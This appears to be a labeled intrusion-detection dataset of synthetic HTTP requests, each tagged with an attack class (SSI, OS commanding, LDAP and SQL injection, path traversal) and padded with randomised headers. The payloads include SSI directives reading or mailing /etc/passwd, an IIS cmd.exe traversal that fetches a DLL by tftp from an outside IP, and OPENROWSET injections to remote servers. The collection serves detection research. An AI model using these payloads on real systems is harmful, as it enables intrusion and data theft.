null

End - Id: 44900
Start - Id: 39740
class: SSI
GET /adrhdanb4a5siOu/n.8-.VNogYFU/DpUPTH-KJ80/nssie.nsf?o5=jDbsbehhihwrif&abphbhtgdvAni5=%3C%21--++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E HTTP/1.1
Host: www.bsnbhss.biz
Connection: keep-alive
Accept: application/*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.8, compress, identity;q=0.3
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 127.62.226.109
Cookie: ttss2ieuh=lggtrnn:d62;eN8osushtzqt=50522
Cookie2: $Version="7"
Date: Fri, 04 Dec 09 19:06:27 CET
ETag: "tYCCtqQXAuY.j2b@k7Gs"
Expect: 100-continue
From: n4tbla@ol8e.st
If-Modified-Since: Thu, 09 Feb 06 12:23:12 UTC
If-Unmodified-Since: Sun, 25 Jul 04 04:38:35 UTC
If-Match: "3y6Fcc-W@ilXEcQNbt14"
If-None-Match: "WS-AYxw8TAVXttq"
If-Range: *
Max-Forwards: 448
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Ilaaw 1hcnv=r7t63
Range: -343,5-1
Referer: /qradHhf/e4d57lm/tepEn.php4
TE: deflate
Trailer: Host
User-Agent: Mozilla/9.7 (Machintosh; U; Mac OS X 1.9; tx-Ua; rv:7.6.0) Gecko/35544429
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 930x2188
Via: 8.7 31.3.176.208, pdt3i5/7.2 12.54.88.254, 1.8 222.255.101.54
Transfer-Encoding: compress
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 43717297958345
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39740
Start - Id: 36528
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: www.envh.com
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: koi8;q=0.7, x-mac-chinesetrad;q=0.7, euc-kr;q=0.4, windows-1252;q=0.9, macintosh
Accept-Encoding: deflate;q=0.3, compress;q=0.7, gzip;q=0.3, gzip;q=0.5
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 164.144.166.119
Cookie: HERng=1adirjn]nceLerippasswdyls
Cookie2: $Version="647"
Date: Thu, 22 Jun 06 15:35:43 CET
ETag: W/"MpfI0bsb1HguCI@Llqy"
Expect: 9nww
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Sat, 02 May 09 13:49:05 UTC
If-Unmodified-Since: Tue, 09 Dec 08 06:29:44 UTC
If-Match: "AaDX_.iFnji7xVF"
If-None-Match: "cN7vKw@Q2CXVi1BJhpXV"
If-Range: Wed, 07 Oct 09 24:33:45 UTC
Max-Forwards: 325
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: ebie lqim0=ntd5
Range: 17-
Referer: http://www.snjaHsPu.it/umnema2/oatuwf/isvb.tiff
TE: trailers,deflate,trailers
Trailer: Host
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 9.0; oe-ib; rv:1.8.2) Gecko/16632981
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 547x5195
Via: 6.8 www.t6wa5h6E.js, 4.7 244.206.70.132
Transfer-Encoding: gzip
Upgrade: oeua/5.5, otN/2.6, 2ts/2.1, ebetns/4.3, r2h/4.2
Warning: 048 www.e6frT.shtml:3476 "eA38Htn4cp4sefaeTVr" 
X-Forwarded-For: 150.134.65.172
X-Serial-Number: 572371428893
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36528
Start - Id: 37536
class: LdapInjection
PUT /dWJS.mdb? HTTP/1.0
Content-Length: 218
Content-Language: fdo0Ter,0aal7kt,gstir
Content-Encoding: identity
Content-Location: /cVthDOt.dll
Content-MD5: TmFIZEExdEl4eGhoY2s3Mw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Nov 06 16:11:07 UTC
Last-Modified: Tue, 23 Oct 07 10:56:24 GMT
Host: www.srhdwtnl.cz
Connection: 7aSst
Accept: */*;q=0.9
Accept-Charset: iso-8859-9, isiri-3342;q=0.0, windows-1250, iso-8859-4;q=0.5
Accept-Encoding: 
Accept-Language: tSosehif-hP
Cache-Control: max-stale
Client-ip: 133.128.23.213
Cookie: qNi_LslQinwinnte=?10;bosndNetiaetu=|hb;ZexbSYTautoexecQ.=mVZ5rjCUn;cumvs80av=oQYczt-;NlLMelathhru=tqhctDhclunh
Cookie2: $Version="02"
Date: Sat, 11 Jun 05 08:47:07 GMT
ETag: "cvwP9_XN-CuZEemWyx2y"
Expect: 5scdi=bsklE1e;ireeen
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 06 Apr 08 18:27:07 GMT
If-Unmodified-Since: Tue, 08 Jun 04 23:19:38 GMT
If-Match: *
If-None-Match: "o@X5y-IYqeEBjommG"
If-Range: Sat, 11 Aug 07 18:52:56 CET
Max-Forwards: 6
MIME-Version: 9.7
Pragma: aisGoeti='h'
Proxy-Authorization: rertml hneO5=eocht
Authorization: sdmm lrnnual=gattn6
Range: 0516-7855,069180-,334-
Referer: /msohehp/9gtdEx/sgrdsi.bin
TE: chunked
Trailer: TE
User-Agent: Mozilla/4.3 (X11; U; SunOS sun4u 3.0; sl-er; rv:9.1.9) Gecko/46205355
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 1.2 119.3.52.102
Transfer-Encoding: deflate
Upgrade: olnrf/9.1
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~

efahs=hr1OjE4diethso&r30ud4Cttemee67=int&7shl9sg=eSghof&tdtinumo=)    ( |    (displayName=had*)    (name =    had*    )(mail=had*   )&NaidmvirT0Xleu=h/&Ctap=n1&oferiTeahs3ecs=\La>>Aa3dnr

End - Id: 37536
Start - Id: 39360
class: SSI
GET /eneu.bin?aeafoaolFHinag2=aphprwherechildgpasswdiiwhereah%5Dom&erqnA0f8wbtsnre=Wllrnnmti&mTtsr=330&ll=onaf&nwetre=rBQQwl&oyrmbes0tepm=se0o&mEtemtSrb9Nk=cvXfVc.&rilesrehShdl8y=lehbWi&OsyedoitPzt7ai=e8+Sto&tpenhi=p%27&hM=9skaorn2oRtp&Js9pWpasswdbody=hpt5dwg&0gsoasvlgd=%3C%21--%23email+fromhost%3D%22www.Acitca.com%22+tohost%3D%22mailbox.toh.com%22+message%3D%228tet+dttbeu+tTh+ag533%22+fromaddress%3D%22et1eR.com%22+toaddress%3D%22ttv.a8Ihw.com%22+subject%3D%22l%22+sender%3D%22tir.com%22+replyto%3D%22Ildukb.com%22+cc%3D%22Tsr%22+inreplyto%3D%22ianlh+Noae+b3%22+id%3D%22lp0mail%22+--%3E&htts4wt=hfwt3anrgom&df2documentE=idbetweenrobject HTTP/1.1
Host: www.edmyddtoha.de
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: x-mac-chinesesimp;q=0.1, windows-874;q=0.8, windows-1252, iso-8859-4, x-mac-greek
Accept-Encoding: 
Accept-Language: notz-P9hftdTo, ieEL0sby-sa
Cache-Control: tnsR='v'
Client-ip: 105.126.198.220
Cookie: 9nt=oo9eHatyr;ctsEaihlssrs=n lservicese;TdEKEFh.VWH=qlfd9-ae9uc;meeuotbsE2eem=e~sssock_streamer]xoupdateeziadminf;np=99380246;Mpyg=84671480
Cookie2: $Version="92"
Date: Thu, 31 Aug 06 04:42:42 UTC
ETag: "otK3._w2Ir0715BPHo"
Expect: tiprS
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 30 Oct 09 15:16:07 CET
If-Unmodified-Since: Sat, 11 Apr 09 05:19:17 GMT
If-Match: *
If-None-Match: "kyW_H@6G9d84fr9Ug_uT"
If-Range: Sat, 26 Jun 04 13:18:48 UTC
Max-Forwards: 797
MIME-Version: 9.5
Pragma: ht=o
Proxy-Authorization: NTLM ZWFtb25kbXdsZm10ZWp0dG9Ub3NsZGlheHJhZWVoUDVyT3NtcDlwZWh0c2hIdHNl
Authorization: Digest uri=/hxhl.mdb
Range: 009-9597,-73,-30
Referer: /1aliu/oemnw5le/EorIg.exe
TE: chunked;q=0.7,gzip,deflate
Trailer: Referer
User-Agent: Ahsl8yioqi/3.0.0.0.6
UA-CPU: 68000
UA-Disp: 3265,6315,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: 3.8 222.47.119.224
Transfer-Encoding: deflate
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 323 73.178.52.116:03197 "ltotAehablocoeeRgen" "Sun, 08 Feb 09 14:43:34 UTC"
X-Forwarded-For: 247.166.24.114
X-Serial-Number: 385637154
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39360
Start - Id: 41818
class: SqlInjection
GET /tw.DjedeqNGoO/9MNFIF/FstoBdoeet/tJxG6k1NeSPL8r/e3V2keKxMLAIal/2lbnOnmdoean/imd/O.@jEAK/rns4uctrf.jpg?yaLyJIhnlai91o=%3B++++insert+++++into+OPENROWSET%28++++%27SQLoledb%27%2C%27uid%3DReeeRze%3Bpwd%3DraunhcTee%3BNetwork%3DDBMSSOCN%3BAddress%3D22.238.9.238%2C1433%3B%27%2C%27select++++*+from++_sysdatabases%27%29%3B+++++select+++*+from+++++LinkedOrRemoteSrv1.master.dbo.sysdatabases&it91kutotgbew1=m&UaGHN=b-8q%4059H&SIWenedee=tX8_IltyX09&.zNjpQ@y_vAF=onzaqt0TuSrobt&eREzea4hnu=67214650&9netcn=i8eor&jjHumeF=7464&sioaEo=dA&3arR=47 HTTP/1.1
Host: www.clngfuoepo.org
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8, utf-7;q=0.6, euc-cn
Accept-Encoding: 
Accept-Language: tat2qit-eerkhE, qrePaya5-eiimfSls
Cache-Control: no-cache
Client-ip: 209.250.197.168
Cookie: 6xmlboot.iniNacceptY=8RRlptUila&t;mKra9re0ers=rroEbhasotEt2hel;nsshsyts=Dr7@yahtaccesaon53nd;wqs0hibeiof=Etr
Cookie2: $Version="1"
Date: Thu, 22 Sep 05 14:13:48 CET
ETag: "F3NzHG9eAT8Ftxhff"
Expect: 100-continue
From: t9iXwsen@4teno.be
If-Modified-Since: Mon, 06 Feb 06 17:50:53 UTC
If-Unmodified-Since: Wed, 05 Jan 05 24:00:08 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 8.0
Pragma: la='oWsr'
Proxy-Authorization: Digest nonce
Authorization: NTLM czB1NG9hYjd0b3RmcnQ4ZWRlZW5venRpNGVyZWl6c254YXNlZXpmbg==
Range: 340098-821
Referer: http://www.9Nleal.fr/poe6/tijoitu/qflb.mspx
TE: trailers
Trailer: Max-Forwards
User-Agent: eetn5o
UA-CPU: x86
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8410x009
Via: enfba/5.4 www.aaUches.png, 9.9 www.44s4t8a.shtml, 5.1 174.177.141.53
Transfer-Encoding: compress
Upgrade: jnthhN/3.0, 4TrI/5.5, dn4Tr/7.6, winj/6.3, edst/8.0
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 206.140.252.134
X-Serial-Number: 34361564811
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41818
Start - Id: 36634
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 106.23.247.247
Connection: ceicmiMT
Accept: application/*;q=0.0
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: dsccvw-hao0svf, mon-T
Cache-Control: no-store
Client-ip: 159.33.177.101
Cookie: ileDrge=os 
Date: Wed, 11 May 05 15:20:02 UTC
ETag: W/"qtYlp.tl8JMop-y6g"
Expect: 100-continue
If-Modified-Since: Sat, 04 Mar 06 02:16:31 UTC
If-Match: *
If-None-Match: "BnYspWJt-nfYPwOHeGX"
If-Range: "weAXubksETS8uuD"
Max-Forwards: 2434
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cmNlcGdhbnd0b29yM25lYWlvZWVFYWQyYXJtWXNlbkRhbXJqaDRsaWV3
Referer: http://www.txhci.com/e0eeeutt/sTan/Yzeinr/rjsselL/eoeprQIM.tiff
TE: trailers,trailers,trailers
User-Agent: mlgu (dZoOTHt)
UA-Pixels: 262x6373
Transfer-Encoding: deflate
Upgrade: tanoeu/5.3, o1rivx/6.2, nfr/2.4, tnwl/0.9
X-Forwarded-For: 43.56.144.162

null

End - Id: 36634
Start - Id: 38953
class: LdapInjection
GET /ntgtieI0wooeCe/z@/sf/gaeu2x/%uVWT_j1OY6Q1/trgdvEeqtetScuEbnepa/tUvEDVI0/yDqexecbIEq3EhzFw/lfasw/yw1mRYB/jPI7I-jInFHyV_o44.msf?ca=edeA&jMebtc4moNfs2=ch%29%28%7C+%28ceb%3D*%29&zry=n-cv&iasiwhafehz=ost%40otbcoemitni%3B&mbn62Oe2wbbgwaB=1Jqm6u&moOlQH33_B5=t7wEJv5t0D&otsmhttbt8Oljo=428884517 HTTP/1.1
Host: 221.192.204.84
Connection: close
Accept: video/*;q=0.8
Accept-Charset: x-mac-ce, hz-gb-2312;q=0.5, cp-936
Accept-Encoding: identity;q=0.1, identity;q=0.9
Accept-Language: cse-s;q=0.9, koo7ese-o;q=0.3, aleenerr-ehwenogh;q=0.5
Cache-Control: max-stale=8267
Client-ip: 69.146.201.136
Cookie: IKuqxsystem=rVtTZO
Cookie2: $Version="1"
Date: Wed, 21 Nov 07 16:25:49 GMT
ETag: "SRCGudR8eFtiS4Ao6"
Expect: 100-continue
From: merdf@ssdhtag.cz
If-Modified-Since: Wed, 19 Apr 06 22:34:26 CET
If-Unmodified-Since: Fri, 26 Jan 07 04:04:34 GMT
If-Match: *
If-None-Match: "9dX3hx96dfOrEM-zEyC"
If-Range: Thu, 29 Jun 06 04:36:29 GMT
Max-Forwards: 1732
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic bW9ldHRpZTp3dWt0aHNt
Authorization: NTLM cWhtYUl5c2Vkc2kxc3hlNkVkNXhBb2VTYWlodDJldGR6YkVldGJqeWU5Z2V1YmJh
Range: 678-706492,70758-,6439-
Referer: /FLnncoit/eowedt/l2etPs/oaem.tar
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.8 (compatible; Ar3zisb; Mac OS X; nkunebaF; Pdts4mtpz7; 58hweia)
UA-CPU: 68000
UA-Disp: 8492,4170,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: FTP/0.3 www.dn70eu.htm, HTTP/9.8 www.eaesn.gif, FTP/2.7 www.ttne.js
Transfer-Encoding: compress
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 338 www.dlne.html "onaaUtdMrofTts" "Sat, 20 Nov 04 10:50:52 GMT"
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38953
Start - Id: 44813
class: PathTransversal
GET /13/agv1SCvmjng1UGSkOqr/eV4/VsamZbin5r-Cl.LtA9q/uKnu4PzWx/MFBand/iMWmbqlCryfNd.jpeg?caez=+%3A&opjiexhm8=file%3A%2F%2F%2Fd%3A%2Fighfm%2FaTa%2Foee.xml&pydahsueK=5130695&iihonE=e2SYng&nwnbmebleE=7594&eabelsstuieet=qx5m2gX&u9v7d4xml=bbmc54dSk&nd8daFmu=5athOsumcopya4s HTTP/1.1
Host: www.bA8ddndnri.biz:80
Connection: keep-alive
Accept: image/*;q=0.7, video/*;q=0.1
Accept-Charset: cp-936;q=0.9, iso-8859-8;q=0.0, shift_jis, x-mac-greek, windows-1251;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 253.244.117.170
Cookie: daonun4=[aicAn;leeooeaecoieh=Nssi1
Cookie2: $Version="8"
Date: Mon, 29 Jun 09 04:17:13 CET
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 100-continue
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sun, 09 Mar 08 04:49:59 CET
If-Unmodified-Since: Wed, 01 Dec 04 24:10:00 GMT
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: Fri, 01 Oct 04 20:37:42 CET
Max-Forwards: 513
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: Digest nc=233d0BC0
Range: -970
Referer: http://www.sjbswe.st/raherfpi.shtml
TE: trailers,trailers
Trailer: Pragma
User-Agent: sdCyiO http://www.eaHR.org
UA-CPU: PowerPC
UA-Disp: 035,8983,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0162x7659
Via: 0.9 www.6hohEnr.tiff, 7.1 134.138.220.239
Transfer-Encoding: deflate
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 65.58.42.42
X-Serial-Number: 40759970154914
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44813
Start - Id: 45418
class: PathTransversal
POST /tywTrmaoiooieenfdrb/eKb39.rVK_I0/Fr79mahdtctar6tht/6k@dUpIs-FL/tMyIOi9x1fUDk6zDgzsk/ziHdnht2u/o8z05UZY72w/itZslnSfjQIsjj.@gL/eZtZKmCO6Da52EpdjE/necal9sro/nZAuK/ioahncyn1a2ehemhe.php4? HTTP/1.1
Content-Length: 124
Content-Language: oLT4m2e,szcDwsh,0s
Content-Encoding: gzip
Content-Location: /plceaM/tEisruh/ntf0bmn/ahrOca.mdb
Content-MD5: MGtoaWhuZWFwaWpSd0V6cA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Dec 08 07:00:28 CET
Last-Modified: Thu, 16 Nov 06 10:34:34 UTC
Host: www.ocihnuea.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5;q=0.4
Accept-Encoding: 
Accept-Language: n-1mfg6;q=0.2, r-FhzGwcnk;q=0.7, 4-3svy;q=0.1
Cache-Control: only-if-cached
Client-ip: 147.195.122.195
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="23"
Date: Sat, 26 Aug 06 21:19:27 GMT
ETag: "6zBxCy6m7hhCDZBV"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Thu, 11 Jun 09 10:06:56 CET
If-Unmodified-Since: Sun, 22 Feb 04 15:25:36 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 24 May 06 16:31:04 GMT
Max-Forwards: 741
MIME-Version: 4.3
Pragma: lk='aog'
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Basic bmNlN25oOnlmYW1sZGtu
Range: -292636,082693-
Referer: http://xfelfq.ch/ojer/ULiotdA/zsigw/orxsisi/ogg24tet.js
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.1 (compatible; uimo; Open BSD i586; or9eh; miehDo)
UA-CPU: PowerPC
UA-Disp: 193,273,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 863x2272
Via: 3.8 202.169.70.21, erin/9.9 www.trdir.png
Transfer-Encoding: identity
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nje=ihtposition6&vyo=6168373800&xssu7c0=../../../WINDOWS/autoexec.bat&kmVrhrab7n0eeen=(Snevbscript+j3t9htl-raahn

End - Id: 45418
Start - Id: 40680
class: SSI
GET /kfetczFYhavinguF6UG/8PMuMQcUujYESJ/tnI39O_5yqI64H/rdYivoRkM8-RuvnZ0/aAsooewietda/DIBdivxp_d6/n0/iNHg0ednweiaEaimuco/0a_JTWuA_lP5L@J.dll?164=rtP62Yx&swsliuroRsoe=gu%29+ra%3At&ec1wsodte=4671&usHiI6=e%24tsdorohvnqb%26&mK5YZ6fd=jaertp&ahero=%3C%21--+++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22--%3E&osAilcsnhanNbu=033&tgiesbnmbstfAeo=stloftgr&rrartnsseaedTa=mfLQ1&ffaa=941685405 HTTP/1.0
Host: www.kmoey.uk
Connection: close
Accept: video/mpeg;q=0.8
Accept-Charset: windows-1254;q=0.0
Accept-Encoding: 
Accept-Language: s3c1y-ps9d0s;q=0.6, bAe-decltb5n;q=0.8, iieis-i
Cache-Control: no-store
Client-ip: 59.227.224.32
Cookie: xrzsneOktnshtws=414;mehsgarXwiEely=9i;pynombol=lNstbars4fmhrera;tqteqef7ewg2zn=eJnointoeEiiheoets;1hclrqr=e.iCg0iie
Date: Sun, 08 Mar 09 03:03:28 CET
ETag: W/"nQowONbBuqGBRqoN"
Expect: a7cn
From: kyipfoyn@ugT7me.be
If-Modified-Since: Sun, 07 Jun 09 13:58:06 UTC
If-Unmodified-Since: Mon, 10 Sep 07 04:09:34 CET
If-Match: "99O..PUVgPiAO.3-gk4"
If-None-Match: *
If-Range: Sat, 17 Sep 05 10:18:40 CET
Max-Forwards: 76
Pragma: mtpBst='5ha'
Proxy-Authorization: Digest realm
Authorization: NTLM dG91cm85YW9hZ2lldW9tbDZnZWl0NTk0aGZ2bWViOTVsdGVZNTY3enJydm4xZWVy
Range: -41940,-0
Referer: /nnagrog/5htk/uccoR6dS/NH9wri/aoisE.css
TE: trailers,chunked;q=0.1
Trailer: Host
User-Agent: Mozilla/0.4 (Machintosh; U; Mac OS X 9.9; ie-r0; rv:2.2.8) Gecko/20026580
UA-CPU: StrongARM
UA-Disp: 854,3532,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 106x2848
Via: 5.6 www.i7bcEo.png:2, ieno/6.2 www.tqvenf.css:28216, 9.9 www.naeq.shtml
Transfer-Encoding: compress
Upgrade: 2vu/5.3, otv/1.9, eEln/4.0, xlziey/0.0, f5sv/6.9
X-Forwarded-For: 199.225.165.233
X-Serial-Number: 017478485639
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40680
Start - Id: 36916
class: LdapInjection
PUT /EWopenBboperl2Ihomehl5/entlab07anomjisroab/aj44O5RgoW.J3jLCHkk/aUm5Haf-g_/CuogIot78aO4ecw.png? HTTP/1.0
Content-Length: 239
Content-Language: usgAloaa,al
Content-Encoding: deflate
Content-Location: http://gctea.gov/qhe8dh5/Ciso.php4
Content-MD5: YXlhb25vbmF0d2FucG9vZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 May 04 08:10:12 CET
Last-Modified: Thu, 26 Jul 07 24:50:59 UTC
Host: 138.6.9.132
Connection: keep-alive
Accept: image/*, application/*
Accept-Charset: us-ascii, x-mac-greek;q=0.7, cp-950
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 23.24.154.22
Cookie: ujYbKx=kqho 
Cookie2: $Version="09"
Date: Sun, 12 Oct 08 15:56:01 UTC
ETag: W/"Kz7Dmc-HYJYpwWQd6ii"
Expect: 100-continue
From: dhafadn@folsiatle.com
If-Modified-Since: Wed, 21 Mar 07 10:19:02 GMT
If-Unmodified-Since: Sun, 22 Mar 09 13:07:45 GMT
If-Match: "SqEw28g1znnBLeF4MU"
If-None-Match: *
If-Range: Sat, 19 Sep 09 21:57:07 UTC
Max-Forwards: 928
MIME-Version: 8.8
Pragma: xpmpsct='soeAsaos'
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest algorithm=MD5-sess
Range: 03-
Referer: /eaxtl/hiNi/Neiula/hcIr2eoc/eeawi.php
TE: trailers,gzip;q=0.5
Trailer: Warning
User-Agent: Mozilla/5.4 (compatible; MSIE 1.5; Windows NT; oe1r0a7y)
UA-CPU: Sparc
UA-OS: Win98
UA-Pixels: 015x0585
Via: 0.9 www.4sseen6y.css:88198, FTP/9.2 www.tatane.css
Transfer-Encoding: gzip
Upgrade: jxf/7.0, xtlsth/8.7
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ra=tydigtoytowseit2&www=oynretlTd6eyiiKd9e&kneeaAiijcnFtar=Un&4co4hOs=)  ( |    (no39=uE*)&90Hcd6sq=tprmn4u'nuisnaccess_logv&sk3=window.openas&tS=9&lxw10DmailB2pB=lconnectze&dmxiyei5eeede=oUShK2&ljhaseli=a0N&orrKy4f5nhEheet=5

End - Id: 36916
Start - Id: 40117
class: SSI
GET /oKF/nsiveermOuu/wEKAzt4TvkacPaow2R/W4Bz89OOj/ImOx_u/omfaut4edddtcttqz/sJFI2J-aB2MHn-/mgj.5/nth2ieutogj9egisrf.shtml?eeA28hoel1je2r=oh&0hWh=oi7atijNese2dsseNI&aWjOdx7=%3C%21--++++%23exec+cmd%3D%22%2Fbin%2Fmail+++++at.com+++%3C++++%2Fetc%2Fpasswd%22--%3E&deletebWfZ=PmellAHeS2ma&nele3heTbi8rpen=r9fsock_streamnTl8Tslogt&oeTrladNotab=25&tnlrrvsiiNw1mzs=gpvxetm2yH&xf=fQdfpIr&nhbHasahry=67202&openTbodyVU=10&iibiitt=uTsh&xy0tceidUa3=EpE8Ieri+te HTTP/1.1
Host: 253.85.114.176
Connection: umai
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rjb-oah;q=0.0
Cache-Control: lssj5ds=o
Client-ip: 149.0.44.161
Cookie: neuMdlyvlwnI=1stasH8seg/3setsdo;e3iup=lW.P;reuo5littjr0=fnlhewmh
Cookie2: $Version="3"
Date: Sat, 29 Aug 09 03:22:51 GMT
ETag: W/"2pP93uTxOps6cWjVyp"
Expect: 100-continue
From: ryup@srni.ch
If-Modified-Since: Fri, 18 Nov 05 15:12:59 CET
If-Unmodified-Since: Sun, 27 Mar 05 04:20:16 UTC
If-Match: *
If-None-Match: "QBL6hjAmg7Mh1Slj"
If-Range: ".psjwGA0JiTgvL77NC"
Max-Forwards: 6
MIME-Version: 3.4
Pragma: q='fnr'
Proxy-Authorization: 39sc yzdsdo8e=siekw
Authorization: lcb2Rh 8feofloz=9eso
Range: 01784-577,9-7,8678-
Referer: /2Osuoal.css
TE: trailers,chunked;q=0.9,chunked;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.5 (compatible; Konqueror/8.2; WinNT; Smeneac)
UA-CPU: 68000
UA-Disp: 8182,5910,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 768x931
Via: 3.6 www.dIrSe.png, 9.2 22.244.43.224, HTTP/2.7 www.lbiom4py.css:6
Transfer-Encoding: compress
Upgrade: elpfin/7.2, thx5zt/2.7
Warning: 530 www.keiqse.jpeg "tjsEot3eeoicdet6rlc" 
X-Forwarded-For: 241.68.225.159
X-Serial-Number: 3431591
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40117
Start - Id: 42225
class: SqlInjection
GET /eJ2X0epu/5iEilxePedcm/iilfdImnernbbe/peb3lst/nsZDI1XLr/TKnp0KrZDRscript.8@.gif?95inWmrpoyV=%3B+++++select++*++from+++++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3Dhenoresvea%3Bpwd%3DeeoaWlr%3BNetwork%3DDBMSSOCN%3BAddress%3D137.46.201.242%2C92218%3B%27%2C%27select++*++from++++rstgar%27++%29 HTTP/1.1
Host: www.eHms.fr
Connection: tldh
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.8, gzip;q=0.2, gzip, gzip, compress;q=0.6
Accept-Language: 2PhNvr0n-l4skRE4g;q=0.2, rysau8ot-tafsec;q=0.6, n-Til, fa-rkee3ts, toage9g-tuO;q=0.1
Cache-Control: only-if-cached
Client-ip: 113.18.47.101
Cookie: obeodeYoilsEqi=|ese@teloitt
Cookie2: $Version="35"
Date: Wed, 14 Jun 06 08:24:10 UTC
ETag: W/"tXiGyLYJXuOw39ER0"
Expect: 100-continue
From: 6bttom@2kOpyg.org
If-Modified-Since: Sun, 17 Apr 05 05:07:41 GMT
If-Unmodified-Since: Sat, 08 Aug 09 22:29:58 UTC
If-Match: *
If-None-Match: "UlE8z_q4FyB7iV_Zfc"
If-Range: "nQD8RjO5nsCm4fa88OPP"
Max-Forwards: 1
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic eXJoZTc6dEVpZXQ=
